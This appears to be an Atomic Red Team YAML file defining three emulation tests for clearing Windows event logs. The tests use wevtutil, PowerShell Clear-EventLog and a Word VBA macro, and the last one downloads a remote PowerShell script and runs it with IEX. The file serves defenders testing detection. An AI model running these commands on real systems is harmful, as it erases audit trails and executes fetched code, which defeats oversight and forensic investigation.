security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
remove_ruby
atomic-red-team/atomics/T1685.005/T1685.005.yaml
T
philhagen-rc 113f30c97c Attack v19 migration (#3329)
2026-05-01 23:10:14 -04:00

62 lines
2.4 KiB
YAML
Raw Permalink Blame History

attack_technique: T1685.005
display_name: 'Disable or Modify Tools: Clear Windows Event Logs'
atomic_tests:
- name: Clear Logs
auto_generated_guid: e6abb60e-26b8-41da-8aae-0c35174b0967
description: |
Upon execution this test will clear Windows Event Logs. Open the System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty.
supported_platforms:
- windows
input_arguments:
log_name:
description: Windows Log Name, ex System
type: string
default: System
executor:
command: |
wevtutil cl #{log_name}
name: command_prompt
elevation_required: true
- name: Delete System Logs Using Clear-EventLog
auto_generated_guid: b13e9306-3351-4b4b-a6e8-477358b0b498
description: |
Clear event logs using built-in PowerShell commands.
Upon successful execution, you should see the list of deleted event logs
Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has very few logs in it.
supported_platforms:
- windows
executor:
command: |
$logs = Get-EventLog -List | ForEach-Object {$_.Log}
$logs | ForEach-Object {Clear-EventLog -LogName $_ }
Get-EventLog -list
name: powershell
elevation_required: true
- name: Clear Event Logs via VBA
auto_generated_guid: 1b682d84-f075-4f93-9a89-8a8de19ffd6e
description: |
This module utilizes WMI via VBA to clear the Security and Backup eventlogs from the system.
Elevation is required for this module to execute properly, otherwise WINWORD will throw an "Access Denied" error
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: |
Microsoft Word must be installed
prereq_command: |
try {
New-Object -COMObject "Word.Application" | Out-Null
Stop-Process -Name "winword"
exit 0
} catch { exit 1 }
get_prereq_command: |
Write-Host "You will need to install Microsoft Word manually to meet this requirement"
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1685.005\src\T1685.005-macrocode.txt" -officeProduct "Word" -sub "ClearLogs"
name: powershell
elevation_required: true
Reference in New Issue View Git Blame Copy Permalink